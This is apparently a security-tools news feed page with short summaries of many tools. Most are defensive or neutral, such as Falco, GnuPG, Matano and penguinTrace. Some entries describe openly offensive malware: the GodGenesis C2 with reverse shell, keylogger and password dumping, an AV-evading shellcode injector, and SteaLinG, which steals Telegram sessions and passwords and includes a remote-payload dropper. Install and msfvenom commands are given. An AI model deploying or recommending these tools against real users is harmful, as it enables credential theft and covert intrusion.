FreshRSS

๐Ÿ”’
โŒ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayTools

Falco 0.33.0

Sysdig Falco is a behavioral activity monitoring agent that is open source and comes with native support for containers. Falco lets you define highly granular rules to check for activities involving file and network activity, process execution, IPC, and much more, using a flexible syntax. Falco will notify you when these rules are violated. You can think about falco as a mix between snort, ossec and strace.

PenguinTrace - Tool To Show How Code Runs At The Hardware Level


penguinTrace is intended to help build an understanding of how programs run at the hardware level. It provides a way to see what instructions compile to, and then step through those instructions and see how they affect machine state as well as how this maps back to variables in the original program. A bit more background is available on the website.

penguinTrace starts a web-server which provides a web interface to edit and run code. Code can be developed in C, C++ or Assembly. The resulting assembly is then displayed and can then be stepped through, with the values of hardware registers and variables in the current scope shown.

penguinTrace runs on Linux and supports the AMD64/X86-64 and AArch64 architectures. penguinTrace can run on other operating systems using Docker, a virtual machine or through the Windows Subsystem for Linux (WSL).


The primary goal of penguinTrace is to allow exploring how programs execute on a processor, however the development provided an opportunity to explore how debuggers work and some lower-level details of interaction with the kernel.

Note: penguinTrace allows running arbitrary code as part of its design. By default it will only listen for connections from the local machine. It should only be configured to listen for remote connections on a trusted network and not exposed to the interface. This can be mitigated by running penguinTrace in a container, and a limited degree of isolation of stepped code can be provided when libcap is available.

Getting Started

Prerequisites

penguinTrace requires 64-bit Linux running on a X86-64 or AArch64 processor. It can also run on a Raspberry Pi running a 64-bit (AArch64) Linux distribution. For other operating systems, it can be run on Windows 10 using the Windows Subsystem for Linux (WSL) or in a Docker container. WSL does not support tracee process isolation.

python
clang
llvm
llvm-dev
libclang-dev
libcap-dev # For containment

Building

To build penguinTrace outside of a container, clone the repository and run make. The binaries will be placed in build/bin by default.

To build penguinTrace in Docker, run docker build -t penguintrace github.com/penguintrace/penguintrace.

Running

Once penguinTrace is built, running the penguintrace binary will start the server.

If built in a container it can then be run with docker run -it -p 127.0.0.1:8080:8080 --tmpfs /tmp:exec --cap-add=SYS_PTRACE --cap-add=SYS_ADMIN --rm --security-opt apparmor=unconfined penguintrace penguintrace. See Containers for details on better isolating the container.

Then navigate to 127.0.0.1:8080 or localhost:8080 to access the web interface.

Note: In order to run on port 80, you can modify the docker run command to map from port 8080 to port 80, e.g. -p 127.0.0.1:80:8080.

If built locally, you can modify the binary to allow it to bind to port 80 with sudo setcap CAP_NET_BIND_SERVICE=+ep penguintrace. It can then be run with penguintrace -c SERVER_PORT 80

penguinTrace defaults to port 8080 as it is intended to be run as an unprivileged user.

Temporary Files

The penguinTrace server uses the system temporary directory as a location for compiled binaries and environments for running traced processes. If the PENGUINTRACE_TMPDIR environment variable is defined, this directory will be used. It will fall back to the TMPDIR environment variable and finally the directories specified in the C library.

This must correspond to a directory without noexec set, if running in a container it is likely the filesystem will have this set by default.

Networking

By default penguinTrace only listens on the loopback device and IPv4. If the server is configured to listen on all addresses, then also setting the server to IPv6 will allow connections on both IPv4 and IPv6, this is the default mode when running in a Docker container.

This is because penguinTrace only creates a single thread to listen to connections and so can currently only bind to a single address or all addresses.

Session Handling

By default penguinTrace runs in multiple session mode, each time code is compiled a new session is created. The URL fragment (after the '#') of the UI is updated with the session id, and this URL can be used to reconnect to the same session.

If running in single session mode each penguinTrace instance only supports a single debugging instance. The web UI will automatically reconnect to a previous session. To support multiple sessions, multiple instances should be launched which are listening on different ports.

Containers

The docker_build.sh and docker_run.sh scripts provide an example of how to run penguinTrace in a Docker container. Dockerfile_noisolate provides an alterative way of running that does not require the SYS_ADMIN capability but provides less isolation between the server and the traced processes. The SYS_PTRACE capability is always required for the server to trace processes. misc/apparmor-profile provides an example AppArmor profile that is suitable for running penguinTrace but may need some customisation for the location of temporary directories and compilers.

AArch64 / Raspberry Pi

penguinTrace will only run under a 64-bit operating system. The official operating systems provided for the Raspberry Pi are all 32-bit, to run penguinTrace something such as pi64 or Arch Linux Arm is required.

Full instructions for setting up a 64-bit OS on Raspberry Pi TBD.

Authors

penguinTrace is developed by Alex Beharrell.

License

This project is licensed under the GNU AGPL. A non-permissive open source license is chosen as the intention of this project is educational, and so any derivative works should have the source available so that people can learn from it.

The bundling of the source code relies on the structure of the repository. Derivative works that are not forked from a penguinTrace repository will need to modify the Makefile rules for static/source.tar.gz to ensure the modified source is correctly distributed.

Acknowledgements

penguinTrace makes use of jQuery and CodeMirror for some aspects of the web interface. Both are licensed under the MIT License. It also uses the Major Mono font which is licensed under the Open Font License.



xnLinkFinder - A Python Tool Used To Discover Endpoints (And Potential Parameters) For A Given Target

About - v2.0

This is a tool used to discover endpoints (and potential parameters) for a given target. It can find them by:

  • crawling a target (pass a domain/URL)
  • crawling multiple targets (pass a file of domains/URLs)
  • searching files in a given directory (pass a directory name)
  • get them from a Burp project (pass location of a Burp XML file)
  • get them from an OWASP ZAP project (pass location of a ZAP ASCII message file)

The python script is based on the link finding capabilities of my Burp extension GAP. As a starting point, I took the amazing tool LinkFinder by Gerben Javado, and used the Regex for finding links, but with additional improvements to find even more.


Installation

xnLinkFinder supports Python 3.

$ git clone https://github.com/xnl-h4ck3r/xnLinkFinder.git
$ cd xnLinkFinder
$ sudo python setup.py install

Usage

Arg Long Arg Description
-i --input Input a: URL, text file of URLs, a Directory of files to search, a Burp XML output file or an OWASP ZAP output file.
-o --output The file to save the Links output to, including path if necessary (default: output.txt). If set to cli then output is only written to STDOUT. If the file already exist it will just be appended to (and de-duplicated) unless option -ow is passed.
-op --output-params The file to save the Potential Parameters output to, including path if necessary (default: parameters.txt). If set to cli then output is only written to STDOUT (but not piped to another program). If the file already exist it will just be appended to (and de-duplicated) unless option -ow is passed.
-ow --output-overwrite If the output file already exists, it will be overwritten instead of being appended to.
-sp --scope-prefix Any links found starting with / will be prefixed with scope domains in the output instead of the original link. If the passed value is a valid file name, that file will be used, otherwise the string literal will be used.
-spo --scope-prefix-original If argument -sp is passed, then this determines whether the original link starting with / is also included in the output (default: false)
-sf --scope-filter Will filter output links to only include them if the domain of the link is in the scope specified. If the passed value is a valid file name, that file will be used, otherwise the string literal will be used.
-c --cookies โ€  Add cookies to pass with HTTP requests. Pass in the format 'name1=value1; name2=value2;'
-H --headers โ€  Add custom headers to pass with HTTP requests. Pass in the format 'Header1: value1; Header2: value2;'
-ra --regex-after RegEx for filtering purposes against found endpoints before output (e.g. /api/v[0-9]\.[0-9]\* ). If it matches, the link is output.
-d --depth โ€  The level of depth to search. For example, if a value of 2 is passed, then all links initially found will then be searched for more links (default: 1). This option is ignored for Burp files because they can be huge and consume lots of memory. It is also advisable to use the -sp (--scope-prefix) argument to ensure a request to links found without a domain can be attempted.
-p --processes โ€  Basic multithreading is done when getting requests for a URL, or file of URLs (not a Burp file). This argument determines the number of processes (threads) used (default: 25)
-x --exclude Additional Link exclusions (to the list in config.yml) in a comma separated list, e.g. careers,forum
-orig --origin Whether you want the origin of the link to be in the output. Displayed as LINK-URL [ORIGIN-URL] in the output (default: false)
-t --timeout โ€  How many seconds to wait for the server to send data before giving up (default: 10 seconds)
-inc --include Include input (-i) links in the output (default: false)
-u --user-agent โ€  What User Agents to get links for, e.g. -u desktop mobile
-insecure โ€  Whether TLS certificate checks should be disabled when making requests (delfault: false)
-s429 โ€  Stop when > 95 percent of responses return 429 Too Many Requests (default: false)
-s403 โ€  Stop when > 95 percent of responses return 403 Forbidden (default: false)
-sTO โ€  Stop when > 95 percent of requests time out (default: false)
-sCE โ€  Stop when > 95 percent of requests have connection errors (default: false)
-m --memory-threshold The memory threshold percentage. If the machines memory goes above the threshold, the program will be stopped and ended gracefully before running out of memory (default: 95)
-mfs --max-file-size โ€  The maximum file size (in bytes) of a file to be checked if -i is a directory. If the file size os over, it will be ignored (default: 500 MB). Setting to 0 means no files will be ignored, regardless of size..
-replay-proxy โ€  For active link finding with URL (or file of URLs), replay the requests through this proxy.
-ascii-only Whether links and parameters will only be added if they only contain ASCII characters. This can be useful when you know the target is likely to use ASCII characters and you also get a number of false positives from binary files for some reason.
-v --verbose Verbose output
-vv --vverbose Increased verbose output
-h --help show the help message and exit

โ€  NOT RELEVANT FOR INPUT OF DIRECTORY, BURP XML FILE OR OWASP ZAP FILE

config.yml

The config.yml file has the keys which can be updated to suit your needs:

  • linkExclude - A comma separated list of strings (e.g. .css,.jpg,.jpeg etc.) that all links are checked against. If a link includes any of the strings then it will be excluded from the output. If the input is a directory, then file names are checked against this list.
  • contentExclude - A comma separated list of strings (e.g. text/css,image/jpeg,image/jpg etc.) that all responses Content-Type headers are checked against. Any responses with the these content types will be excluded and not checked for links.
  • fileExtExclude - A comma separated list of strings (e.g. .zip,.gz,.tar etc.) that all files in Directory mode are checked against. If a file has one of those extensions it will not be searched for links.
  • regexFiles - A list of file types separated by a pipe character (e.g. php|php3|php5 etc.). These are used in the Link Finding Regex when there are findings that aren't obvious links, but are interesting file types that you want to pick out. If you add to this list, ensure you escape any dots to ensure correct regex, e.g. js\.map
  • respParamLinksFound โ€  - Whether to get potential parameters from links found in responses: True or False
  • respParamPathWords โ€  - Whether to add path words in retrieved links as potential parameters: True or False
  • respParamJSON โ€  - If the MIME type of the response contains JSON, whether to add JSON Key values as potential parameters: True or False
  • respParamJSVars โ€  - Whether javascript variables set with var, let or const are added as potential parameters: True or False
  • respParamXML โ€  - If the MIME type of the response contains XML, whether to add XML attributes values as potential parameters: True or False
  • respParamInputField โ€  - If the MIME type of the response contains HTML, whether to add NAME and ID attributes of any INPUT fields as potential parameters: True or False
  • respParamMetaName โ€  - If the MIME type of the response contains HTML, whether to add NAME attributes of any META tags as potential parameters: True or False

โ€  IF THESE ARE NOT FOUND IN THE CONFIG FILE THEY WILL DEFAULT TO True

Examples

Find Links from a specific target - Basic

python3 xnLinkFinder.py -i target.com

Find Links from a specific target - Detailed

Ideally, provide scope prefix (-sp) with the primary domain (including schema), and a scope filter (-sf) to filter the results only to relevant domains (this can be a file or in scope domains). Also, you can pass cookies and customer headers to ensure you find links only available to authorised users. Specifying the User Agent (-u desktop mobile) will first search for all links using desktop User Agents, and then try again using mobile user agents. There could be specific endpoints that are related to the user agent given. Giving a depth value (-d) will keep sending request to links found on the previous depth search to find more links.

python3 xnLinkFinder.py -i target.com -sp target_prefix.txt -sf target_scope.txt -spo -inc -vv -H 'Authorization: Bearer XXXXXXXXXXXXXX' -c 'SessionId=MYSESSIONID' -u desktop mobile -d 10

Find Links from a list of URLs - Basic

If you have a file of JS file URLs for example, you can look for links in those:

python3 xnLinkFinder.py -i target_js.txt

Find Links from a files in a directory - Basic

If you have a files, e.g. JS files, HTTP responses, etc. you can look for links in those:

python3 xnLinkFinder.py -i ~/Tools/waymore/results/target.com

NOTE: Sub directories are also checked. The -mfs option can be specified to skip files over a certain size.

Find Links from a Burp project - Basic

In Burp, select the items you want to search by highlighting the scope for example, right clicking and selecting the Save selected items. Ensure that the option base64-encode requests and responses option is checked before saving. To get all links from the file (even with HUGE files, you'll be able to get all the links):

python3 xnLinkFinder.py -i target_burp.xml

NOTE: xnLinkFinder makes the assumption that if the first line of the file passed with -i starts with <?xml then you are trying to process a Burp file.

Find Links from a Burp project - Detailed

Ideally, provide scope prefix (-sp) with the primary domain (including schema), and a scope filter (-sf) to filter the results only to relevant domains.

python3 xnLinkFinder.py -i target_burp.xml -o target_burp.txt -sp https://www.target.com -sf target.* -ow -spo -inc -vv

Find Links from an OWASP ZAP project - Basic

In ZAP, select the items you want to search by highlighting the History for example, clicking menu Report and selecting Export Messages to File.... This will let you save an ASCII text file of all requests and responses you want to search. To get all links from the file (even with HUGE files, you'll be able to get all the links):

python3 xnLinkFinder.py -i target_zap.txt

NOTE: xnLinkFinder makes the assumption that if the first line of the file passed with -i is in the format ==== 99 ========== for example, then you are trying to process an OWASP ZAP ASCII text file.

Piping to other Tools

You can pipe xnLinkFinder to other tools. Any errors are sent to stderr and any links found are sent to stdout. The output file is still created in addition to the links being piped to the next program. However, potential parameters are not piped to the next program, but they are still written to file. For example:

python3 xnLinkFinder.py -i redbull.com -sp https://redbull.com -sf rebbull.* -d 3 | unfurl keys | sort -u

You can also pass the input through stdin instead of -i.

cat redbull_subs.txt | python3 xnLinkFinder.py -sp https://redbull.com -sf rebbull.* -d 3

NOTE: You can't pipe in a Burp or ZAP file, these must be passed using -i.

Recommendations and Notes

  • Always use the Scope Prefix argument -sp. This can be one scope domain, or a file containing multiple scope domains. Below are examples of the format used (no path should be included, and no wildcards used. Schema is optional, but will default to http):
    http://www.target.com
    https://target-payments.com
    https://static.target-cdn.com
    If a link is found that has no domain, e.g. /path/to/example.js then giving passing -sp http://www.target.com will result in teh output http://www.target.com/path/to/example.js and if Depth (-d) is >1 then a request will be able to be made to that URL to search for more links. If a file of domains are passed using -sp then the output will include each domain followed by /path/to/example.js and increase the chance of finding more links.
  • If you use -sp but still want the original link of /path/to/example.js (without a domain) additionally returned in the output, the pass the argument -spo.
  • Always use the Scope Filter argument -sf. This will ensure that only relevant domains are returned in the output, and more importantly if Depth (-d) is >1 then out of scope targets will not be searched for links or parameters. This can be one scope domain, or a file containing multiple scope domains. Below are examples of the format used (no schema or path should be included):
    target.*
    target-payments.com
    static.target-cdn.com
    THIS IS FOR FILTERING THE LINKS DOMAIN ONLY.
  • If you want to filter the final output in any way, use -ra. It's always a good idea to use https://regex101.com/ to check your Regex expression is going to do what you expect.
  • Use the -v option to have a better idea of what the tool is doing.
  • If you have problems, use the -vv option which may show errors that are occurring, which can possibly be resolved, or you can raise as an issue on github.
  • Pass cookies (-c), headers (-H) and regex (-ra) values within single quotes, e.g. -ra '/api/v[0-9]\.[0-9]\*'
  • Set the -o option to give a specific output file name for Links, rather than the default of output.txt. If you plan on running a large depth of searches, start with 2 with option -v to check what is being returned. Then you can increase the Depth, and the new output will be appended to the existing file, unless you pass -ow.
  • Set the -op option to give a specific output file name for Potential Parameters, rather than the default of parameters.txt. Any output will be appended to the existing file, unless you pass -ow.
  • If using a high Depth (-d) be wary of some sites using dynamic links so will it will just keep finding new ones. If no new links are being found, then xnlLinkFinder will stop searching. Providing the Stop flags (s429, s403, sTO, sCE) should also be considered.
  • If you are finding a large number of links (especially if the Depth (-d value is high), and have limited resources, the program will stop when it reaches the memory Threshold (-m) value and end gracefully with data intact before getting killed.
  • If you decide to cancel xnLinkFinder (using Ctrl-C) in the middle of running, be patient and any gathered data will be saved before ending gracefully.
  • Using the -orig option will show the URL where the link was found. This can mean you have duplicate links in the output if the same link was found on multiple sources, but it will suffixed with the origin URL in square brackets.
  • When making requests, xnLinkFinder will use a random User-Agent from the current group, which defaults to desktop. If you have a target that could have different links for different user agent groups, the specify -u desktop mobile for example (separate with a space). The mobile user agent option is an combination of mobile-apple, mobile-android and mobile-windows.
  • When -i has been set to a directory, the contents of the files in the root of that directory will be searched for links. Files in sub-directories are not searched. Any files that are over the size set by -mfs (default: 500 MB) will be skipped.
  • When using the -replay-proxy option, sometimes requests can take longer. If you start seeing more Request Timeout errors (you'll see errors if you use -v or -vv options) then consider using -t to raise the timeout limit.
  • If you know a target will only have ASCII characters in links and parameters then consider passing -ascii-only. This can eliminate a number of false positives that can sometimes get returned from binary data.

Issues

If you come across any problems at all, or have ideas for improvements, please feel free to raise an issue on Github. If there is a problem, it will be useful if you can provide the exact command you ran and a detailed description of the problem. If possible, run with -vv to reproduce the problem and let me know about any error messages that are given.

TODO

  • I seem to have completed all the TODO's I originally had! If you think of any that need adding, let me know
    ๏ค˜

Example output

Active link finding for a domain:

...

Piped input and output:

Good luck and good hunting! If you really love the tool (or any others), or they helped you find an awesome bounty, consider BUYING ME A COFFEE!ย โ˜• (I could use the caffeine!)

๏ค˜
/XNL-h4ck3r


JSubFinder - Searches Webpages For Javascript And Analyzes Them For Hidden Subdomains And Secrets


JSubFinder is a tool writtin in golang to search webpages & javascript for hidden subdomains and secrets in the given URL. Developed with BugBounty hunters in mind JSubFinder takes advantage of Go's amazing performance allowing it to utilize large data sets & be easily chained with other tools.


Install

Install the application and download the signatures needed to find secrets

Using GO:

go get github.com/ThreatUnkown/jsubfinder
wget https://raw.githubusercontent.com/ThreatUnkown/jsubfinder/master/.jsf_signatures.yaml && mv .jsf_signatures.yaml ~/.jsf_signatures.yaml

or

Downloads Page

Basic Usage

Search

Search the given url's for subdomains and secrets

$ jsubfinder search -h

Execute the command specified

Usage:
JSubFinder search [flags]

Flags:
-c, --crawl Enable crawling
-g, --greedy Check all files for URL's not just Javascript
-h, --help help for search
-f, --inputFile string File containing domains
-t, --threads int Ammount of threads to be used (default 5)
-u, --url strings Url to check

Global Flags:
-d, --debug Enable debug mode. Logs are stored in log.info
-K, --nossl Skip SSL cert verification (default true)
-o, --outputFile string name/location to store the file
-s, --secrets Check results for secrets e.g api keys
--sig string Location of signatures for finding secrets
-S, --silent Disable printing to the console

Examples (results are the same in this case):

$ jsubfinder search -u www.google.com
$ jsubfinder search -f file.txt
$ echo www.google.com | jsubfinder search
$ echo www.google.com | httpx --silent | jsubfinder search$

apis.google.com
ogs.google.com
store.google.com
mail.google.com
accounts.google.com
www.google.com
policies.google.com
support.google.com
adservice.google.com
play.google.com

With Secrets Enabled

note --secrets="" will save the secret results in a secrets.txt file

$ echo www.youtube.com | jsubfinder search --secrets=""
www.youtube.com
youtubei.youtube.com
payments.youtube.com
2Fwww.youtube.com
252Fwww.youtube.com
m.youtube.com
tv.youtube.com
music.youtube.com
creatoracademy.youtube.com
artists.youtube.com

Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com

Advanced examples

$ echo www.google.com | jsubfinder search -crawl -s "google_secrets.txt" -S -o jsf_google.txt -t 10 -g
  • -crawl use the default crawler to crawl pages for other URL's to analyze
  • -s enables JSubFinder to search for secrets
  • -S Silence output to console
  • -o <file> save output to specified file
  • -t 10 use 10 threads
  • -g search every URL for JS, even ones we don't think have any

Proxy

Enables the upstream HTTP proxy with TLS MITM sypport. This allows you to:

  1. Browse sites in realtime and have JSubFinder search for subdomains and secrets real time.
  2. If needed run jsubfinder on another server to offload the workload
$ JSubFinder proxy -h

Execute the command specified

Usage:
JSubFinder proxy [flags]

Flags:
-h, --help help for proxy
-p, --port int Port for the proxy to listen on (default 8444)
--scope strings Url's in scope seperated by commas. e.g www.google.com,www.netflix.com
-u, --upstream-proxy string Adress of upsteam proxy e.g http://127.0.0.1:8888 (default "http://127.0.0.1:8888")

Global Flags:
-d, --debug Enable debug mode. Logs are stored in log.info
-K, --nossl Skip SSL cert verification (default true)
-o, --outputFile string name/location to store the file
-s, --secrets Check results for secrets e.g api keys
--sig string Location of signatures for finding secrets
-S, --silent Disable printing to the console
$ jsubfinder proxy
Proxy started on :8444
Subdomain: out.reddit.com
Subdomain: www.reddit.com
Subdomain: 2Fwww.reddit.com
Subdomain: alb.reddit.com
Subdomain: about.reddit.com

With Burp Suite

  1. Configure Burp Suite to forward traffic to an upstream proxy/ (User Options > Connections > Upsteam Proxy Servers > Add)
  2. Run JSubFinder in proxy mode

Burp Suite will now forward all traffic proxied through it to JSubFinder. JSubFinder will retrieve the response, return it to burp and in another thread search for subdomains and secrets.

With Proxify

  1. Launch Proxify & dump traffic to a folder proxify -output logs
  2. Configure Burp Suite, a Browser or other tool to forward traffic to Proxify (see instructions on their github page)
  3. Launch JSubFinder in proxy mode & set the upstream proxy as Proxify jsubfinder proxy -u http://127.0.0.1:8443
  4. Use Proxify's replay utility to replay the dumped traffic to jsubfinder replay -output logs -burp-addr http://127.0.0.1:8444

Run on another server

Simple, run JSubFinder in proxy mode on another server e.g 192.168.1.2. Follow the proxy steps above but set your applications upstream proxy as 192.168.1.2:8443

Advanced Examples

$ jsubfinder proxy --scope www.reddit.com -p 8081 -S -o jsf_reddit.txt
  • --scope limits JSubFinder to only analyze responses from www.reddit.com
  • -p port JSubFinders proxy server is running on
  • -S silence output to the console/stdout
  • -o <file> output examples to this file


GNU Privacy Guard 2.3.8

GnuPG (the GNU Privacy Guard or GPG) is GNU's tool for secure communication and data storage. It can be used to encrypt data and to create digital signatures. It includes an advanced key management facility and is compliant with the proposed OpenPGP Internet standard as described in RFC2440. As such, it is meant to be compatible with PGP from NAI, Inc. Because it does not use any patented algorithms, it can be used without any restrictions.

GNU Privacy Guard 2.2.40

GnuPG (the GNU Privacy Guard or GPG) is GNU's tool for secure communication and data storage. It can be used to encrypt data and to create digital signatures. It includes an advanced key management facility and is compliant with the proposed OpenPGP Internet standard as described in RFC2440. As such, it is meant to be compatible with PGP from NAI, Inc. Because it does not use any patented algorithms, it can be used without any restrictions. This is the LTS release.

GodGenesis - A Python3 Based C2 Server To Make Life Of Red Teamer A Bit Easier. The Payload Is Capable To Bypass All The Known Antiviruses And Endpoints

God Genesis is a C2 server purely coded in Python3 created to help Red Teamers and Penetration Testers. Currently It only supports TCP reverse shell but wait a min, its a FUD and can give u admin shell from any targeted WINDOWS Machine.


The List Of Commands It Supports :-

                ===================================================================================================
BASIC COMMANDS:
===================================================================================================
help --> Show This Options
terminate --> Exit The Shell Completely
exit --> Shell Works In Background And Prompted To C2 Server
clear --> Clear The Previous Outputs

===================================================================================================
SYSTEM COMMANDS:
===================================================================================================
cd --& gt; Change Directory
pwd --> Prints Current Working Directory
mkdir *dir_name* --> Creates A Directory Mentioned
rm *dir_name* --> Deletes A Directoty Mentioned
powershell [command] --> Run Powershell Command
start *exe_name* --> Start Any Executable By Giving The Executable Name

===================================================================================================
INFORMATION GATHERING COMMANDS:
===================================================================================================
env --> Checks Enviornment Variables
sc --> Lists All Services Running
user --> Current User
info --> Gives Us All Information About Compromised System
av --> Lists All antivirus In Compromised System

===================================================================================================
DATA EXFILTRATION COMMANDS:
===================================================================================================
download *file_name* --> Download Files From Compromised System
upload *file_name* --> Uploads Files To Victim Pc


===================================================================================================
EXPLOITATION COMMANDS:
========================================================== =========================================
persistence1 --> Persistance Via Method 1
persistence2 --> Persistance Via Method 2
get --> Download Files From Any URL
chrome_pass_dump --> Dump All Stored Passwords From Chrome Bowser
wifi_password --> Dump Passwords Of All Saved Wifi Networks
keylogger --> Starts Key Logging Via Keylogger
dump_keylogger --> Dump All Logs Done By Keylogger
python_install --> Installs Python In Victim Pc Without UI


Features Of Our Framework :-

Check The Video To Get A Detail Knowledge

1. The Payload.py is a FULLY UNDETECTABLE(FUD) use your own techniques for making an exe file. (Best Result When Backdoored With Some Other Legitimate Applictions)
2. Able to perform privilege escalation on any windows systems.
3. Fud keylogger
4. 2 ways of achieving persistance
5. Recon automation to save your time.

How To Use Our Tool :

git clone https://github.com/SaumyajeetDas/GodGenesis.git

pip3 install -r requirements.txt

python3 c2c.py

It is worth mentioning that Suman Chakraborty have contributed in the framework by coding the the the Fud Keyloger, Wifi Password Extraction and Chrome Password Dumper modules.

Dont Forget To Change The IP ADDRESS Manually in both c2c.py and payload.py



Matano - The Open-Source Security Lake Platform For AWS


Matano is an open source security lake platform for AWS. It lets you ingest petabytes of security and log data from various sources, store and query them in an open Apache Iceberg data lake, and create Python detections as code for realtime alerting. Matano is fully serverless and designed specifically for AWS and focuses on enabling high scale, low cost, and zero-ops. Matano deploys fully into your AWS account.


Features

Collect data from all your sources

Matano lets you collect log data from sources using S3 or SQS based ingestion.

Ingest, transform, normalize log data

Matano normalizes and transforms your data using Vector Remap Language (VRL). Matano works with the Elastic Common Schema (ECS) by default and you can define your own schema.

Store data in S3 object storage

Log data is always stored in S3 object storage, for cost effective, long term, durable storage.

Apache Iceberg Data lake

All data is ingested into an Apache Iceberg based data lake, allowing you to perform ACID transactions, time travel, and more on all your log data. Apache Iceberg is an open table format, so you always own your own data, with no vendor lock-in.

Serverless

Matano is a fully serverless platform, designed for zero-ops and unlimited elastic horizontal scaling.

Detections as code

Write Python detections to implement realtime alerting on your log data.

Installing

View the complete installation instructions.

You can install the matano CLI to deploy Matano into your AWS account, and manage your Matano deployment.

Requirements

  • Docker

Installation

Matano provides a nightly release with the latest prebuilt files to install the Matano CLI on GitHub. You can download and execute these files to install Matano.

For example, to install the Matano CLI for Linux, run:

curl -OL https://github.com/matanolabs/matano/releases/download/nightly/matano-linux-x64.sh
chmod +x matano-linux-x64.sh
sudo ./matano-linux-x64.sh

Getting started

Read the complete docs on getting started.

Deployment

To get started with Matano, run the matano init command. Make sure you have AWS credentials in your environment (or in an AWS CLI profile).

The interactive CLI wizard will walk you through getting started by generating an initial Matano directory for you, initializing your AWS account, and deploying Matano into your AWS account.


Initial deployment takes a few minutes.

Documentation

View our complete documentation.

License



FUD-UUID-Shellcode - Another shellcode injection technique using C++ that attempts to bypass Windows Defender using XOR encryption sorcery and UUID strings madness


Introduction

Another shellcode injection technique using C++ that attempts to bypass Windows Defender using XOR encryption sorcery and UUID strings madness :).


How it works

Shellcode generation

  • Firstly, generate a payload in binary format( using either CobaltStrike or msfvenom ) for instance, in msfvenom, you can do it like so( the payload I'm using is for illustration purposes, you can use whatever payload you want ):

    msfvenom -p windows/messagebox  -f raw -o shellcode.bin
  • Then convert the shellcode( in binary/raw format ) into a UUID string format using the Python3 script, bin_to_uuid.py:

    ./bin_to_uuid.py -p shellcode.bin > uuid.txt
  • xor encrypt the UUID strings in the uuid.txt using the Python3 script, xor_encryptor.py.

    ./xor_encryptor.py uuid.txt > xor_crypted_out.txt
  • Copy the C-style array in the file, xor_crypted_out.txt, and paste it in the C++ file as an array of unsigned char i.e. unsigned char payload[]{your_output_from_xor_crypted_out.txt}

Execution

This shellcode injection technique comprises the following subsequent steps:

  • First things first, it allocates virtual memory for payload execution and residence via VirtualAlloc
  • It xor decrypts the payload using the xor key value
  • Uses UuidFromStringA to convert UUID strings into their binary representation and store them in the previously allocated memory. This is used to avoid the usage of suspicious APIs like WriteProcessMemory or memcpy.
  • Use EnumChildWindows to execute the payload previously loaded into memory( in step 1 )

What makes it unique?

  • It doesn't use standard functions like memcpy or WriteProcessMemory which are known to raise alarms to AVs/EDRs, this program uses the Windows API function called UuidFromStringA which can be used to decode data as well as write it to memory( Isn't that great folks? And please don't say "NO!" :) ).
  • It uses the function call obfuscation trick to call the Windows API functions
  • Lastly, because it looks unique :) ( Isn't it? :) )

Important

  • You have to change the xor key(row 86) to what you wish. This can be done in the ./xor_encryptor.py python3 script by changing the KEY variable.
  • You have to change the default executable filename value(row 90) to your filename.
  • The command for compiling is provided in the C++ file( around the top ). NB: mingw was used but you can use whichever compiler you prefer. :)

Compile

make

Proof-of-Concept( PoC )

Static Analysis

AV Scan results

The binary was scanned using antiscan.me on 01/08/2022.

Credits

https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/



SteaLinG - Open-Source Penetration Testing Framework Designed For Social Engineering


The SteaLinG is an open-source penetration testing framework designed for social engineering After the hack, you can upload it to the victim's device and run it

disclaimers:

This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes

How can I benefit from this project?

  • you can use it
    ๏˜‚
  • for developers
    you can read the source code and try to understand how to make a project like this

Features


module Short description
Dump password steal All passwords saved , upload file a passwords saved to mega
Dump History dump browser history
dump files Steal files from the hard drive with the extension you want

New features

module Short description
1-Telegram Session Hijack Telegram session hijacker
  • How it works ? The recording session in Telegram is stored locally in this particular path C:\Users<pc name >\AppData\Roaming\Telegram Desktop in the 'tedata' folder
C:
โ””โ”€โ”€ Users
โ”œโ”€โ”€ .AppData
โ”‚ย ย  โ””โ”€โ”€ Roaming
โ”‚ย ย  โ””โ”€โ”€ TelegramDesktop
โ”‚ย ย  โ””โ”€โ”€ tdata

Once you have moved this folder with all its contents on your device in the same path, then you do what will happen for it is that simple The tool does all this, all you have to do is give it your token on the site https://anonfiles.com/ The first step is to go to the path where the tdata file is located, and then convert it to a zip file. Of course, if the Telegram was working, this would not happen. If there was any error, it means that the Telegram is open, so I would do the kill processes. antivirus You will see that this is malicious behavior, so I avoided this part at all by the try and except in the code The name of the archive file is used in the name of the device of your victim, because if you have more than one, I mean, after that, you will post request for the zipfile on the anonfiles website using the API key or the token of your account on the site. On it, you will find your token Just that, teacher, and it is not exposed from any AV

module
2- Dropper
  • What requirements does he need from you?
  • And how does it work?? Requirements The first thing it asks you is the URL of the virus or whatever you want to download to the victim's device, but keep in mind that the URL must be direct, meaning that it must be the end Its Yama .exe or .png, whatever is important is that it be a link that ends with a backstamp The second thing is to take the API Kay from you, and you will answer it as well. Either you register, click on the word API, you will find it, and you will take the username and password So how does it work?ย 

The first thing is to create a paste on the site and make it private Then it adds the url you gave it and then it gives you the exe file, its function is that when it works on any device it starts adding itself to Registry device in two different ways It starts to open pastebin and inserts the special paste you created, takes the paste url, downloads its content and runs And you can enter the url at any time and put another url. It is very normal because the dropper goes every 10 minutes. Checks the URL. If it finds it, it changes it, downloads its content, downloads it, and connects to find it. You don't do anything, and so, every 10 minutes, you can literally do it, you can access your device from anywhere

3- Linux support

4-You can now choose between Mega or Pastebin

Requirements

  • python >= 3.8 ++ Download Python
  • os : Windows
  • os : Linux

Installation to Windows:

git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
pip install -r requirements.txt
python SteaLinG.py

Installation to Linux

git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
chmod +x linux_setup.sh
bash linux_setup.sh
python SteaLinG.py

warning:

* Don't Upload in VirusTotal.com Bcz This tool will not work with Time.
* Virustotal Share Signatures With AV Comapnies.
* Again Don't be an Idiot!

AV detection


Media



Monkey365 - Tool For Security Consultants To Easily Conduct Not Only Microsoft 365, But Also Azure Subscriptions And Azure Active Directory Security Configuration Reviews


